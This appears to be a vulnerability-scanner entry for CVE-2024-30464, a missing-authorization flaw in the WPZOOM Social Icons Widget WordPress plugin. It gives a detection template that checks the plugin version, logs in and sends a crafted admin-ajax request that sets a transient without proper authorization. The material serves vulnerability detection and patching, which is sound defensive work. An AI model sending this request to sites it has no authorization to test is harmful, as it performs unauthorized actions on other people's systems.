WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
CVE-2024-30464
Verified
Description
WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.
Severity
Medium
CVSS Score
4.3
Exploit Probability
2%
Affected Product
social-icons-widget-by-wpzoom
Published Date
March 13, 2026
Template Author
pussycat0x
CVE-2024-30464.yaml
id: CVE-2024-30464
info:
name: WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
author: pussycat0x
severity: medium
description: |
WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.
impact: |
Attackers can perform unauthorized actions, potentially leading to data tampering or privilege escalation.
remediation: |
Update to version 4.2.16 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2024-30464
epss-score: 0.01517
epss-percentile: 0.71483
cwe-id: CWE-862
metadata:
verified: true
max-request: 4
vendor: wpzoom
product: social-icons-widget-by-wpzoom
framework: wordpress
publicwww-query: "/plugins/social-icons-widget-by-wpzoom/"
tags: cve,cve2024,wordpress,wp,wp-plugin,wpzoom,authenticated
variables:
rand: "{{rand_int(10000, 99999)}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "compare_versions(version, '<= 4.2.15')"
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: version
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
action=zoom_ajax_set_pointer_transient&transient_name={{rand}}&lifetime=3600
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body,"Done, transient is set") && contains(body,"success\":true")'
condition: and
# digest: 4b0a00483046022100a0c96aa66d6e32deb7b393c7a78f27852b103e45ad28d099e6058812781fadfc022100c56ddc839d92f0bf693d2b2bd40e1f57db9e4d54d9c6fe2152a45af6447a185e:922c64590222798bb761d5b6d8e729504.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2024-30464
CWE ID:
cwe-862
Remediation Steps
Update to version 4.2.16 or later.